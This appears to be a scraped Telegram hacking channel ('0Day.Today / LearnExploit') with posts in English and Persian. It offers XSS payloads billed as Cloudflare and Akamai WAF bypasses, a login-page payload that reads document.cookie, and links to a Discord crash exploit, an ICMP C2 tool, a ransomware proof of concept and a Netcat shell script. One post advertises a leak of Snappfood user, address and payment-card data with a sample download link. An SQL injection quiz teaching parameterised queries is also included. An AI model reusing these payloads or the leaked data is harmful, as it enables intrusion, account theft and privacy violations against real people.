0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Cloudflare XSS Bypass Payload ⚡️

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>


#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
6❤‍🔥3👍2
Marijuana Exploit 🍀

⬇️ Download

🔒 @LearnExploit

#Exploit #Bot

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6🆒3👎2👍1
Discord vc exploit to crash vcs

Github

#discord #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍51
Akamai GHost Bypass


<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>


#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
2👍2🆒1
Payload XSS on login page:

');\\</script><script>alert(document.cookie)</script>('%00tst@tst.com.br


#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥41🆒1
اسنپ‌فود هک شد!

به طور خلاصه موارد زیر در اختیار فروشنده قرار داره :

- اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ...
- اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره تلفن و ...
- اطلاعات بیش از ۱۸۰ میلیون دستگاه همراه شامل: نوع و مدل دستگاه، پلتفرم، توکن، فروشگاه نصب برنامه و ...
- اطلاعات بیش از ۳۶۰ میلیون سفارش شامل: آی‌پی سفارش دهنده، آدرس دریافتی، تلفن دریافتی، شهر، مدت زمان دریافت، نام و نام خانوادگی، مشخصات فروشگاه یا رستوران، قیمت، محصول و ...
- اطلاعات بیش از ۳۵ هزار پیک شامل: نام، نام خانوادگی، شماره تماس، کد ملی، شهر و ...
- اطلاعات بیش از ۶۰۰ هزار پرداخت سفارش شامل: نام کامل صاحب کارت، نام کامل مشتری، شماره تماس، شماره کارت، نام بانک و ...
- اطلاعات بیش از ۱۶۰ میلیون سفر انجام شده توسط پیک شامل: نام کامل مبدا و مقصد، آدرس مبدا و مقصد، تلفن مبدا و مقصد، موقعیت جغرافیایی مبدا و مقصد، تاریخ و ...
- اطلاعات بیش از ۲۴۰ هزار Vendor شامل: نام کامل، آدرس، تلفن، ایمیل، موقعیت مکانی GPS، نام مدیریت مجموعه و ...
- اطلاعات بیش از ۸۸۰ میلیون سفارش محصول

سمپل:
https://mega.nz/file/0OdnDI7Q#tqpjOn6Xrg8tJhgkNh0W1szRZWe4adlHjrVPgf6UhPM

#leak #news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥7👎32🤯2😁1
سایته تارگت سینگل یا دابل کوتیشن رو وقتی دارید تسته xss میگیرید بلاک میکنه ؟ از پیلود زیر استفاده کنید ⚡️

</script><svg/onload=alert(0)>



#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥2👍211
♨️ چالش SQLi تمام شد.

❗️چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند.

💬گزینه هارو همراه با ذکر علت بفرمایید.

🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه.

توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال
گزینه ی ۱و۲ به دلیل ...



1- cursor.execute("SELECT id FROM users WHERE username = '" + username + "'");

2- cursor.execute("SELECT id FROM users WHERE username = '%s'" % username);


3- cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username));


4- cursor.execute(f"SELECT id FROM users WHERE username = '{username}'");


5- cursor.execute("SELECT id FROM users WHERE username = '%s'", (username, ));


6- cursor.execute("SELECT id FROM users WHERE username = %(username)s", {'username': username});
👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 2023

┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 2024

iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥135🔥1
PingRAT - PingRAT secretly passes C2 traffic through firewalls using ICMP payloads

Github

#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3
Phirautee - A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares

Github

#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥2👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
♨️ چالش SQLi تمام شد. ❗️چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند. 💬گزینه هارو همراه با ذکر علت بفرمایید. 🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه. توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال…
♨️ جواب چالش :
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :

⚠️ نتیجه بعد از اجرا شدن
1. cursor.execute("SELECT id FROM users WHERE username = '" '; SELECT 1=1; -- "'"); 
2. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
3. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
4. cursor.execute(f"SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");


توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
5. cursor.execute("SELECT id FROM users WHERE username = True");
6. cursor.execute("SELECT id FROM users WHERE username = True");


در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub

برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee

دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
🔥5👍4
🎸 Thank you for your support 🎸


🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥5👍1
Shell(@LearnExploit).py
1.2 KB
دسترسی شل با Netcat ⚡️

#netcat #shell

KhodeEhsan

——————
0Day.Today
@LearnExploit
@Tech_Army
411🤬1